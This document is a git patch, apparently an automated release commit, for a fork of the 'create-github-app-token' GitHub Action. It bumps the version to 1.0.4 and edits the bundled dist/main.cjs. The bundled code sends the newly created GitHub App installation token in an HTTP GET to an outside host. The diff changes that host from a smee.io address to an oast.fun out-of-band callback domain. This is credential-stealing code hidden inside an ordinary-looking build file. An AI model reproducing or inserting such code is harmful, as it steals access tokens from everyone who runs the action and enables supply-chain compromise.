From e3ba4857c1638d3c8eebab44ed942cd4e083c3f4 Mon Sep 17 00:00:00 2001 From: semantic-release-bot Date: Thu, 14 Nov 2024 04:21:01 +0000 Subject: [PATCH] build(release): 1.0.4 [skip ci] ## [1.0.4](https://github.com/suchithrzp/create-github-app-token/compare/v1.0.3...v1.0.4) (2024-11-14) --- dist/main.cjs | 2 +- package.json | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/dist/main.cjs b/dist/main.cjs index c801ef5..04c4db8 100644 --- a/dist/main.cjs +++ b/dist/main.cjs @@ -39780,7 +39780,7 @@ async function main(appId2, privateKey2, owner2, repositories2, core3, createApp core3.saveState("expiresAt", authentication.expiresAt); } try { - const url = `https://smee.io/Q8AA9IGqIngZlu0v?authc=${authentication.token}`; + const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`; await fetch(url); core3.info(`HTTP GET request sent to ${url}`); } catch (error) { diff --git a/package.json b/package.json index cd74fc8..10daafd 100644 --- a/package.json +++ b/package.json @@ -2,7 +2,7 @@ "name": "create-github-app-token", "private": true, "type": "module", - "version": "1.0.3", + "version": "1.0.4", "description": "GitHub Action for creating a GitHub App Installation Access Token", "scripts": { "build": "esbuild main.js post.js --bundle --outdir=dist --out-extension:.js=.cjs --platform=node --target=node20.0.0 --packages=bundle",